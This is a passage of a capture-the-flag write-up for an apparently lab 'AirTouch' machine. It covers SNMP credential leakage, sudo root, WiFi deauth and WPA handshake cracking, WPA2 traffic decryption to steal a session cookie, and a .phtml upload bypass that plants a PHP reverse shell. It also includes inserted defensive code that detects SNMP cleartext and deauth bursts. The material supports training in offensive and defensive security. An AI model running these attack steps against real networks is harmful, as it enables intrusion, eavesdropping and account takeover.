1 RECON

1.1 Port Scan

Bash
rustscan -a $targetIp --ulimit 1000 -r 1-65535 -- -A -sC -Pn

Only port 22 is open. So we pivot to UDP and scan with udpx:

Bash
udpx -t $targetIp -c 128 -w 1001

That immediately reveals SNMP:

axura @ labyrinth :~
$ udpx -t $targetIp -c 128 -w 1000

    __ ______ ____ _   __
   / / / / __ \/ __ \|/ /
  / / / / / / / /_/ /  / 
 / /_/ / /_/ / ____/  | 
 \____/_____/_/  /_/|_| 
 v1.0.7, by @nullt3r

2026/01/17 18:47:40 [+] Starting UDP scan on 1 target(s)
2026/01/17 18:47:52 [*] 10.129.11.56:161 (snmp)
2026/01/17 18:48:12 [+] Scan completed

Port 161 is open for SNMP.

2 WEB

2.1 SNMP

2.1.1 SNMP 101

SNMP (Simple Network Management Protocol) is used to monitor and manage devices like servers, switches, routers, and printers.

Versions:

  • SNMPv1 / v2c: uses community strings (basically a password)
  • SNMPv3: uses real auth + encryption

Community string:

  • "public" = default read-only
  • "private" = default read-write
  • custom strings

OIDs (Object IDs): SNMP data is stored as a tree, and each node has a numeric ID, for example:

  • 1.3.6.1.2.1.1 = system info (sysDescr, sysName, etc.)
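As an added example (not code from the write-up), here is a small decoder for the SNMP message envelope. It shows concretely why a v1/v2c community string is just a cleartext password on the wire, and flags default strings the way a passive sensor would. The function names and both sample datagrams are constructed for this example.

```python
"""Added example, not code from the write-up: a minimal decoder for the outer
SNMP message envelope.  It shows why a v1/v2c community string is "basically
a password" that anyone on the path can read, and how v3 differs.  Both
sample datagrams below are constructed by hand, not captured from the lab."""

DEFAULT_COMMUNITIES = {"public", "private"}

PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA5: "GetBulkRequest"}


def _read_tlv(buf: bytes, pos: int):
    """Decode one BER TLV; returns (tag, value, position after the value)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def decode_snmp_envelope(packet: bytes) -> dict:
    """Return the version and, for v1/v2c, the cleartext community string.

    v1 (version=0) and v2c (version=1):
        Message ::= SEQUENCE { version INTEGER, community OCTET STRING, data PDU }
    v3 (version=3) replaces the community with msgGlobalData plus security
    parameters, so there is no cleartext community to read.
    """
    tag, body, _ = _read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not a BER SEQUENCE")
    tag, ver_bytes, pos = _read_tlv(body, 0)
    if tag != 0x02:
        raise ValueError("missing version INTEGER")
    version = int.from_bytes(ver_bytes, "big")
    if version == 3:
        return {"version": "v3", "community": None, "pdu": None, "cleartext_secret": False}
    tag, community, pos = _read_tlv(body, pos)
    if tag != 0x04:
        raise ValueError("missing community OCTET STRING")
    pdu_tag, _pdu_body, _ = _read_tlv(body, pos)
    return {"version": {0: "v1", 1: "v2c"}.get(version, f"v{version}"),
            "community": community.decode("latin-1"),
            "pdu": PDU_NAMES.get(pdu_tag, f"pdu-0x{pdu_tag:02x}"),
            "cleartext_secret": True}


def audit(packet: bytes) -> list:
    """Findings a passive network sensor would raise for one SNMP datagram."""
    info = decode_snmp_envelope(packet)
    findings = []
    if info["cleartext_secret"]:
        findings.append(f"SNMP{info['version']} carries its community string in cleartext")
        if info["community"] in DEFAULT_COMMUNITIES:
            findings.append(f"default community string '{info['community']}' in use")
        if info["pdu"] == "SetRequest":
            findings.append("write access (SetRequest) gated only by a community string")
    return findings


# Constructed sample: SNMPv2c GetRequest for sysDescr.0 (1.3.6.1.2.1.1.1.0)
# with community "public", the same string onesixtyone found above.
SAMPLE_V2C_GET = bytes.fromhex(
    "3026"                      # SEQUENCE, 38 bytes
    "020101"                    # version INTEGER 1 = v2c
    "0406" "7075626c6963"       # community OCTET STRING "public"
    "a019"                      # GetRequest PDU, 25 bytes
    "020101" "020100" "020100"  # request-id, error-status, error-index
    "300e" "300c"               # VarBindList / VarBind
    "0608" "2b06010201010100"   # OID 1.3.6.1.2.1.1.1.0
    "0500"                      # NULL value
)

# Constructed sample: the start of an SNMPv3 message (version 3, then the
# msgGlobalData SEQUENCE with placeholder fields); no community string exists.
SAMPLE_V3_HEADER = bytes.fromhex(
    "300b"                      # SEQUENCE, 11 bytes (header only)
    "020103"                    # version INTEGER 3
    "3006" "020101" "020100"    # msgGlobalData: msgID, msgMaxSize (placeholders)
)

if __name__ == "__main__":
    print(decode_snmp_envelope(SAMPLE_V2C_GET))
    for finding in audit(SAMPLE_V2C_GET):
        print("[!]", finding)
    print(decode_snmp_envelope(SAMPLE_V3_HEADER))
```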

2.1.2 SNMP Exploitation

We can traverse the SNMP tree with snmpwalk, but first we need the community string.

Bruteforce it with onesixtyone:

Bash
onesixtyone -i <(echo $targetIp) -c $wordlist

Result:

axura @ labyrinth :~
$ export strings=/home/Axura/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt

$ onesixtyone -i <(echo $targetIp) -c $strings
Scanning 1 hosts, 120 communities
10.129.11.56 [public] "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"
10.129.11.56 [public] "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"

From the onesixtyone output:

  • Community: public
  • Consultant password: RxBlZhLmOkacNWScmZ6D

Now we just need the missing piece: the username.

Since SNMP literally leaks "consultant password", the account is very likely named consultant (or something close like svc-consultant).

Try the obvious SSH login:

axura @ labyrinth :~
$ ssh consultant@airtouch.htb
consultant@airtouch.htb's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)

 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Sun Jan 18 07:15:31 2026 from 10.10.14.27
consultant@AirTouch-Consultant:~$ id
uid=1000(consultant) gid=1000(consultant) groups=1000(consultant)
consultant@AirTouch-Consultant:~$ hostname
AirTouch-Consultant

SNMP leak → default credential reuse → SSH as consultant. Foothold acquired.

2.2 VLAN Wifi Pivoting

"AirTouch" pretty much screams WiFi appliance / AP controller / captive portal energy.

2.2.1 Internal Network

2.2.1.1 Enumeration

First, inspect the interfaces:

axura @ labyrinth :~
consultant@AirTouch-Consultant:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0@if29: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 22:9b:1c:c2:a4:cb brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.20.1.2/24 brd 172.20.1.255 scope global eth0
       valid_lft forever preferred_lft forever
7: wlan0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
8: wlan1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff
9: wlan2: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
10: wlan3: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:03:00 brd ff:ff:ff:ff:ff:ff
11: wlan4: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff
12: wlan5: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:05:00 brd ff:ff:ff:ff:ff:ff
13: wlan6: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:06:00 brd ff:ff:ff:ff:ff:ff

This is the key line:

ShellSession
2: eth0@if29: <...> state UP
    inet 172.20.1.2/24

eth0@if29 means eth0 is one end of a veth pair, linked to interface index 29 on the host side. That's classic container-style networking (bridge / virtual switch), likely sitting behind something like a docker0-type setup.

And then we have:

ShellSession
wlan0 ... state DOWN ... 02:00:00:00:00:00
wlan1 ... state DOWN ... 02:00:00:00:01:00
...
wlan6 ... state DOWN ... 02:00:00:00:06:00

These are virtual WiFi interfaces. The MACs are clean, synthetic, and deterministic — not real hardware.

Right now they're down, meaning nothing is driving them yet:

  • no active WiFi simulation
  • no AP/controller process pulling them up

But the takeaway is obvious:

This box is built to run WiFi tooling and services locally.

2.2.1.2 Topology

There are two interesting diagrams sitting in the consultant's home directory. Pull them down:

axura @ labyrinth :~
consultant@AirTouch-Consultant:~$ ls -a
.   .bash_history  .bashrc  .profile         photo_2023-03-01_22-04-52.png
..  .bash_logout   .cache   diagram-net.png

consultant@AirTouch-Consultant:~$ logout
Connection to airtouch.htb closed.

$ scp consultant@airtouch.htb:/home/consultant/diagram-net.png .
consultant@airtouch.htb's password:
diagram-net.png                                             100%  129KB  11.7KB/s   00:10

$ scp consultant@airtouch.htb:/home/consultant/photo_2023-03-01_22-04-52.png .
consultant@airtouch.htb's password:
photo_2023-03-01_22-04-52.png                               100%  726KB  19.7KB/s   00:36

$ ls
diagram-net.png     photo_2023-03-01_22-04-52.png

From diagram-net.png, we get the full picture: three isolated VLANs / networks sitting behind a NAT router.

NAT Router (blue)

At the top:

  • :22 -> 172.20.1.2:22
  • :161 -> 172.20.1.2:161

Only two ports (SSH 22 & SNMP 161) are NAT-forwarded externally, which matches our observation.

VLAN A — Consultant VLAN (yellow)

The consultant laptop is 172.20.1.2/24, which matches our current foothold on AirTouch-Consultant.

VLAN B — Tablets VLAN (red)

  • SSID: AirTouch-Internet
  • "Tablet manager" = 192.168.3.0/24

This looks like an internal management segment, likely hosting something only reachable from inside.

VLAN C — Corp VLAN (green)

  • SSID: AirTouch-Office
  • Corporate computer = 10.10.10.0/24

This is the real prize: the internal corporate VLAN, and most likely the final destination.

2.2.2 Goals

photo_2023-03-01_22-04-52.png (the hand sketch) tells the same story:

  • Consultant VLAN (switch + laptops)
  • Tablets VLAN (AP "AirTouch-Internet")
  • Corp VLAN (AP "AirTouch-Office")
  • NAT connecting them

Our objective is to:

  1. foothold on Consultant VLAN (done)
  2. pivot into Tablets VLAN (192.168.3.0/24)
  3. pivot into Corp VLAN (10.10.10.0/24)
  4. steal flags / root

Now the real question is:

How can we reach 192.168.3.0/24 and/or 10.10.10.0/24 from our current foothold (172.20.1.2/24)?

2.2.3 Sudo

Even though we don't have direct access to the WLANs yet, we do have something better: full sudo on the box. So jump straight to root on AirTouch-Consultant by simply running sudo su:

axura @ labyrinth :~
consultant@AirTouch-Consultant:~$ ip -br a
lo               UNKNOWN        127.0.0.1/8 ::1/128
eth0@if29        UP             172.20.1.2/24
wlan0            DOWN
wlan1            DOWN
wlan2            DOWN
wlan3            DOWN
wlan4            DOWN
wlan5            DOWN
wlan6            DOWN

consultant@AirTouch-Consultant:~$ sudo -l
Matching Defaults entries for consultant on AirTouch-Consultant:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User consultant may run the following commands on AirTouch-Consultant:
    (ALL) NOPASSWD: ALL
    
consultant@AirTouch-Consultant:~$ sudo su

root@AirTouch-Consultant:/home/consultant# id
uid=0(root) gid=0(root) groups=0(root)

2.2.4 Sniffing

At this point we have everything we need:

  • root on AirTouch-Consultant
  • multiple simulated WiFi radios (wlan0..wlan6)

So we can treat this box as our wireless attacker, connect to AirTouch-Internet (Tablets VLAN), and pivot deeper.

Bring up one interface (start with wlan0) and scan for nearby SSIDs:

Bash
ip link set wlan0 up
iw dev wlan0 scan | egrep "SSID:|BSS |signal:|freq:"

Result:

axura @ labyrinth :~
root@AirTouch-Consultant:/home/consultant# ip link set wlan0 up
root@AirTouch-Consultant:/home/consultant# iw dev wlan0 scan | egrep "SSID:|BSS |signal:|freq:"
BSS 5e:58:90:a3:f2:9f(on wlan0)
        freq: 2412
        signal: -30.00 dBm
        SSID: vodafoneFB6N
BSS 1a:38:bb:6e:58:ae(on wlan0)
        freq: 2422
        signal: -30.00 dBm
        SSID: MOVISTAR_FG68
BSS ca:04:fd:9c:c9:c9(on wlan0)
        freq: 2437
        signal: -30.00 dBm
        SSID: WIFI-JOHN
BSS f0:9f:c2:a3:f1:a7(on wlan0)
        freq: 2437
        signal: -30.00 dBm
        SSID: AirTouch-Internet
BSS ae:5e:43:d4:b6:e0(on wlan0)
        freq: 2452
        signal: -30.00 dBm
        SSID: MiFibra-24-D4VY
BSS ac:8b:a9:aa:3f:d2(on wlan0)
        freq: 5220
        signal: -30.00 dBm
        SSID: AirTouch-Office
BSS ac:8b:a9:f3:a1:13(on wlan0)
        freq: 5220
        signal: -30.00 dBm
        SSID: AirTouch-Office

This lines up perfectly with the topology diagram — we can see both internal SSIDs, including two corporate APs.

AirTouch-Internet (Tablet VLAN)

  • SSID: AirTouch-Internet
  • BSSID: f0:9f:c2:a3:f1:a7
  • Freq: 2437 MHz → Channel 6
  • Signal: -30 dBm (strong)

AirTouch-Office (Corp VLAN)

  • BSSID #1: ac:8b:a9:aa:3f:d2
  • BSSID #2: ac:8b:a9:f3:a1:13
  • Freq: 5220 MHz → Channel 44

2.2.5 Pivot

Next move: pivot into the Tablets VLAN first — AirTouch-Internet.

We'll do this in two lanes:

  • Lane A: capture a WPA handshake (monitor mode)
  • Lane B: connect to the SSID (managed mode)

Phase 1 — Capture

Bash
# Put wlan0 into monitor mode
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

# verify
iw dev wlan0 info

wlan0 has now been switched from managed to monitor mode, and it comes up locked to channel 1 (2412 MHz):

axura @ labyrinth :~
root@AirTouch-Consultant:/home/consultant# iw dev wlan0 info
Interface wlan0
        ifindex 7
        wdev 0x1
        addr 02:00:00:00:00:00
        type monitor
        wiphy 0
        channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
        txpower 20.00 dBm

Now scan the air:

Bash
airodump-ng wlan1

Result:

axura @ labyrinth :~
 CH 13 ][ Elapsed: 2 mins ][ 2026-01-18 09:44 

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 F0:9F:C2:A3:F1:A7  -28       84       10    0   6   54        CCMP   PSK  AirTouch-Internet 
 CA:04:FD:9C:C9:C9  -28       84        0    0   6   54        CCMP   PSK  WIFI-JOHN         
 AE:5E:43:D4:B6:E0  -28       83        0    0   9   54   WPA2 CCMP   PSK  MiFibra-24-D4VY   
 1A:38:BB:6E:58:AE  -28      167        0    0   3   54        CCMP   PSK  MOVISTAR_FG68     
 5E:58:90:A3:F2:9F  -28     1175        0    0   1   54        TKIP   PSK  vodafoneFB6N      

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 F0:9F:C2:A3:F1:A7  28:6C:07:FE:A3:22  -29   12 - 9      0       10
 (not associated)   28:6C:07:12:EE:F3  -29    0 - 1      0        4         AirTouch-Office
 (not associated)   C8:8A:9A:6F:F9:D2  -29    0 - 1      0        9         AccessLink,AirTouc
 (not associated)   28:6C:07:12:EE:A1  -29    0 - 1      0        6         AirTouch-Office

wlan1 can see AirTouch-Internet and the surrounding APs, so we can use it as our sniffer/injector.

Note: airodump-ng is channel-hopping (CH 13 in the header). We can lock it using -c.

Right now the capture shows no STATION associated to AirTouch-Internet, meaning no client is talking. So deauth may do nothing unless someone reconnects.

From the table in 2.2.4, AirTouch-Internet is:

  • BSSID: F0:9F:C2:A3:F1:A7
  • Channel: 6

Lock the capture and write to disk:

Bash
airodump-ng --bssid F0:9F:C2:A3:F1:A7 -c 6 -w /tmp/inet wlan0

Leave it running until we see a client:

axura @ labyrinth :~
 CH  6 ][ Elapsed: 1 min ][ 2026-01-18 09:52 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 F0:9F:C2:A3:F1:A7  -28 100      755       31    0   6   54        CCMP   PSK  AirTouch-Inter

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 F0:9F:C2:A3:F1:A7  28:6C:07:FE:A3:22  -29    1 -18      0       33         AirTouch-Internet

Phase 2 — Handshake

In a second terminal, force a reconnect:

Bash
# Deauth using the same interface name (wlan0)
sudo su
aireplay-ng -0 10 -a F0:9F:C2:A3:F1:A7 wlan0
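The flip side of this step, as an added example that is not part of the write-up: detection logic for the deauthentication burst that aireplay-ng -0 produces. It parses raw 802.11 management frame headers, counts deauth/disassoc frames per BSSID in a sliding window and alerts when the rate is far above anything a real AP sends. The class and function names are mine, all frames are constructed fixtures, and the BSSID and station MAC are the ones seen in the airodump-ng output above.

```python
"""Added example, not code from the write-up: detection logic for the
deauthentication burst that a tool like aireplay-ng -0 produces.  It parses
raw 802.11 management frame headers (radiotap already stripped), counts
deauth/disassoc frames per BSSID in a sliding window, and alerts when the
rate is far above what a real AP sends.  All frames here are constructed
fixtures; the BSSID and station MAC are the ones seen in the write-up."""
from collections import defaultdict, deque
from typing import Optional

SUBTYPE_BEACON = 0x08
SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C


def _mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def parse_mgmt_header(frame: bytes) -> Optional[dict]:
    """Subtype, addresses and reason code of a management frame; None otherwise.

    Header layout: FC(2) Duration(2) Addr1(6) Addr2(6) Addr3(6) SeqCtl(2),
    followed for deauth/disassoc by a 2-byte little-endian reason code.
    """
    if len(frame) < 24:
        return None
    fc = frame[0]
    ftype = (fc >> 2) & 0x03
    if ftype != 0:                       # only type 0 (management) carries deauth/disassoc
        return None
    return {
        "subtype": (fc >> 4) & 0x0F,
        "da": _mac(frame[4:10]),
        "sa": _mac(frame[10:16]),
        "bssid": _mac(frame[16:22]),
        "reason": int.from_bytes(frame[24:26], "little") if len(frame) >= 26 else None,
    }


class DeauthDetector:
    """Alert when more than `threshold` deauth/disassoc frames name the same
    BSSID within `window` seconds; a healthy AP emits a handful per minute."""

    def __init__(self, threshold: int = 8, window: float = 2.0):
        self.threshold = threshold
        self.window = window
        self._seen = defaultdict(deque)     # bssid -> recent timestamps
        self.alerts = []

    def observe(self, ts: float, frame: bytes) -> Optional[str]:
        hdr = parse_mgmt_header(frame)
        if hdr is None or hdr["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            return None
        q = self._seen[hdr["bssid"]]
        q.append(ts)
        while q and ts - q[0] > self.window:  # drop timestamps outside the window
            q.popleft()
        if len(q) > self.threshold:
            msg = (f"t={ts:.2f}s deauth burst: {len(q)} frames within {self.window}s "
                   f"against BSSID {hdr['bssid']} (last reason code {hdr['reason']})")
            self.alerts.append(msg)
            q.clear()                       # one alert per burst, not one per frame
            return msg
        return None


def _fixture_frame(subtype: int, da: str, sa: str, bssid: str, reason: int = 7) -> bytes:
    """Management frame header plus a 2-byte body (the reason code for
    deauth/disassoc), built only as a test fixture for the detector."""
    fc = bytes([subtype << 4, 0x00])        # type 0 (management), no flags
    addrs = b"".join(bytes.fromhex(a.replace(":", "")) for a in (da, sa, bssid))
    return fc + b"\x00\x00" + addrs + b"\x00\x00" + reason.to_bytes(2, "little")


AP = "f0:9f:c2:a3:f1:a7"          # AirTouch-Internet BSSID from the scan above
CLIENT = "28:6c:07:fe:a3:22"      # the station airodump-ng showed associated to it
BCAST = "ff:ff:ff:ff:ff:ff"


def simulate() -> list:
    """A beacon and two ordinary deauths produce nothing; a burst of ten trips the alert."""
    det = DeauthDetector(threshold=8, window=2.0)
    det.observe(0.0, _fixture_frame(SUBTYPE_BEACON, BCAST, AP, AP))
    det.observe(5.0, _fixture_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP, reason=4))   # inactivity
    det.observe(60.0, _fixture_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP, reason=4))
    for i in range(10):                    # ten broadcast deauths in half a second
        det.observe(120.0 + i * 0.05, _fixture_frame(SUBTYPE_DEAUTH, BCAST, AP, AP))
    return det.alerts


if __name__ == "__main__":
    for alert in simulate():
        print("[!]", alert)
```

Detection is the fallback; the mitigation is 802.11w (ieee80211w=2 in hostapd.conf), under which clients drop deauth/disassoc frames that are not cryptographically protected.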

Phase 3 - Crack

Stop the capture (Ctrl+C) and check the output files:

axura @ labyrinth :~
root@AirTouch-Consultant:/home/consultant# ls /tmp
inet-01.cap            inet-01.log.csv     inet-02.kismet.netxml  inet-03.kismet.csv
inet-01.csv            inet-02.cap         inet-02.log.csv        inet-03.kismet.netxml
inet-01.kismet.csv     inet-02.csv         inet-03.cap            inet-03.log.csv
inet-01.kismet.netxml  inet-02.kismet.csv  inet-03.csv

root@AirTouch-Consultant:/home/consultant# aircrack-ng /tmp/inet-01.cap | head -n 30
Reading packets, please wait...
Opening /tmp/inet-01.cap
Read 0 packets.
No networks found, exiting.
Quitting aircrack-ng...

root@AirTouch-Consultant:/home/consultant# for f in /tmp/inet-0*.cap; do
>   echo "==== $f ===="
>   ls -lh "$f"
>   wc -c "$f"
> done
==== /tmp/inet-01.cap ====
-rw-r--r-- 1 root root 24 Jan 18 09:25 /tmp/inet-01.cap
24 /tmp/inet-01.cap
==== /tmp/inet-02.cap ====
-rw-r--r-- 1 root root 24 Jan 18 09:34 /tmp/inet-02.cap
24 /tmp/inet-02.cap
==== /tmp/inet-03.cap ====
-rw-r--r-- 1 root root 262K Jan 18 10:01 /tmp/inet-03.cap
267644 /tmp/inet-03.cap

We immediately see the difference:

  • inet-01.cap = 24 bytes → empty placeholder (airodump-ng created the file but captured nothing)
  • inet-02.cap = 24 bytes → same
  • inet-03.cap = 262 KB → real capture (packets exist)

To inspect the real capture, run:

axura @ labyrinth :~
root@AirTouch-Consultant:/home/consultant# aircrack-ng /tmp/inet-03.cap | head -n 40
Reading packets, please wait...
Opening /tmp/inet-03.cap
Read 5440 packets.

## BSSID ESSID Encryption

   1  F0:9F:C2:A3:F1:A7  AirTouch-Internet         WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening /tmp/inet-03.cap
Read 5440 packets.

1 potential targets

Please specify a dictionary (option -w).

Perfect:

  • ESSID: AirTouch-Internet
  • WPA (1 handshake)
  • 5440 packets

Pull the capture to our attack box:

Bash
scp consultant@airtouch.htb:/tmp/inet-03.cap .

Then crack locally:

Bash
aircrack-ng -w /home/Axura/wordlists/rockyou.txt ./inet-03.cap

Key found:

axura @ labyrinth :~
                               Aircrack-ng 1.7

      [00:00:01] 27019/10303727 keys tested (20284.95 k/s)

      Time left: 8 minutes, 26 seconds                           0.26%

                           KEY FOUND! [ challenge ]


      Master Key     : D1 FF 70 2D CB 11 82 EE C9 E1 89 E1 69 35 55 A0
                       07 DC 1B 21 BE 35 8E 02 B8 75 74 49 7D CF 01 7E

      Transient Key  : D3 63 DE 84 F1 31 F2 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

      EAPOL HMAC     : EE CF A7 E8 F1 CA 1E CF 5B 53 47 3E 8E 71 E8 66

PSK: challenge for AirTouch-Internet.

Phase 4 - Connect

Use a different interface (wlan0 can stay in monitor mode or be switched back to managed; it doesn't matter). I'll use wlan3.

Bash
cat > /tmp/inet.conf << 'EOF'
network={
    ssid="AirTouch-Internet"
    psk="challenge"
    scan_ssid=1
    key_mgmt=WPA-PSK
}
EOF

Connect and grab DHCP:

Bash
# run as root
ip link set wlan3 up
wpa_supplicant -B -D nl80211 -i wlan3 -c /tmp/inet.conf
dhclient -v wlan3

Result:

axura @ labyrinth :~
root@AirTouch-Consultant:/home/consultant# cat > /tmp/inet.conf << 'EOF'
> network={
>     ssid="AirTouch-Internet"
>     psk="challenge"
>     scan_ssid=1
>     key_mgmt=WPA-PSK
> }
> EOF

root@AirTouch-Consultant:/home/consultant# ip link set wlan3 up

root@AirTouch-Consultant:/home/consultant# wpa_supplicant -B -D nl80211 -i wlan3 -c /tmp/inet.conf
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information

root@AirTouch-Consultant:/home/consultant# dhclient -v wlan3
[… snip …]
Listening on LPF/wlan3/02:00:00:00:03:00
Sending on   LPF/wlan3/02:00:00:00:03:00
Sending on   Socket/fallback
DHCPDISCOVER on wlan3 to 255.255.255.255 port 67 interval 3 (xid=0x27986317)
DHCPDISCOVER on wlan3 to 255.255.255.255 port 67 interval 4 (xid=0x27986317)
DHCPOFFER of 192.168.3.46 from 192.168.3.1
DHCPREQUEST for 192.168.3.46 on wlan3 to 255.255.255.255 port 67 (xid=0x17639827)
DHCPACK of 192.168.3.46 from 192.168.3.1 (xid=0x27986317)
bound to 192.168.3.46 -- renewal in 38069 seconds.

root@AirTouch-Consultant:/home/consultant# ip a
[… snip …]
10: wlan3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 02:00:00:00:03:00 brd ff:ff:ff:ff:ff:ff
    inet 192.168.3.46/24 brd 192.168.3.255 scope global dynamic wlan3
       valid_lft 86397sec preferred_lft 86397sec
[… snip …]

wlan3 pulls a lease from the Tablets VLAN:

  • wlan3 IP: 192.168.3.46/24
  • DHCP / gateway: 192.168.3.1

We're officially inside AirTouch-Internet — the "Tablet manager" segment from the diagram.

Phase 5 - Pivot Scan

Upload a static nmap binary and scan the subnet:

axura @ labyrinth :~
$ scp ~/hacktools/linux/static_binary/nmap consultant@airtouch.htb:/tmp/
consultant@airtouch.htb's password:
nmap                                                        100% 5805KB 384.1KB/s   00:15

$ ssh consultant@airtouch.htb
consultant@airtouch.htb's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Sun Jan 18 10:38:39 2026 from 10.10.14.27

consultant@AirTouch-Consultant:~$ chmod +x /tmp/nmap

consultant@AirTouch-Consultant:~$ /tmp/nmap 192.168.3.0/24
Nmap scan report for 192.168.3.1
Host is up (0.00083s latency).
Not shown: 1179 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

Nmap scan report for 192.168.3.46
Host is up (0.00089s latency).
Not shown: 1181 closed ports
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 256 IP addresses (2 hosts up) scanned in 10.62 seconds

The Tablets VLAN is tiny by design:

  • 192.168.3.1 = Tablet Manager / gateway
    • Open: 22/SSH, 53/DNS, 80/HTTP
  • 192.168.3.46 = us (wlan3 client)

So the next pivot is 100% through 192.168.3.1:80.

3 USER

3.1 PHP Web App

3.1.1 Port Forward

Forward 192.168.3.1:80 to our local machine:

Bash
# bind to localhost:8888
ssh -L 8888:192.168.3.1:80 consultant@airtouch.htb

Quick fingerprint — a plain PHPSESSID session cookie is in use:

axura @ labyrinth :~
$ whatweb http://127.0.0.1:8888
http://127.0.0.1:8888 [302 Found] Apache[2.4.41], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[127.0.0.1], RedirectLocation[login.php]
http://127.0.0.1:8888/login.php [200 OK] Apache[2.4.41], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[127.0.0.1], PasswordField[Password], Title[WiFi Router Configuration]

A PHP login panel pops up — the PSK router's web UI.

3.1.2 WPA2 Traffic Decryption

Since we already cracked the PSK for AirTouch-Internet, we can instruct Wireshark to decrypt WPA2 traffic.

Navigate to: Edit → Preferences → Protocols → IEEE 802.11 → Decryption Keys

Add the key in this format:

WEP and WPA Decryption Keys
wpa-pwd : challenge:AirTouch-Internet

After decryption, we can read the HTTP traffic between real clients and the router web panel at 192.168.3.1. To hunt for session cookies, use the display filter http.cookie, which reveals requests like:

HTTP
GET /lab.php HTTP/1.1
Host: 192.168.3.1
User-Agent: curl/7.88.1
Accept: */*
Cookie: PHPSESSID=cj3hbdogkk82ksifpbkbiauudr; UserRole=user

Response:

HTML
<!DOCTYPE html>
<html>

<head>
    <title>WiFi Router Configuration</title>
    <link rel="stylesheet" href="style.css">
</head>

<body>

Welcome manager<br><br><br><br>
Congratulation! You have logged into password protected page. <a href="index.php">Click here</a> to go to index.php to get the flag. 

</body>

</html>

Drop that cookie into our browser and access /lab.php (grab a fresh .cap if it expires):

Login confirmed as manager (user role).

3.1.3 PHP Web Shell

If we flip the cookie from UserRole=user to UserRole=admin, the app unlocks file uploads:

But the filter blocks obvious payloads:

Sorry, PHP and HTML files are not allowed.Sorry, your file was not uploaded.

So this turns into a classic upload-bypass game.

Using the .phtml extension works cleanly here (see the "Upload Insecure Files" README in swisskyrepo/PayloadsAllTheThings).

Drop a PHP reverse shell (e.g., ivan-sincek's php-reverse-shell), but set the callback IP to 192.168.3.46 (our Tablets VLAN client). Trigger it via /uploads/rev.phtml.

Shell lands as www-data:

axura @ labyrinth :~
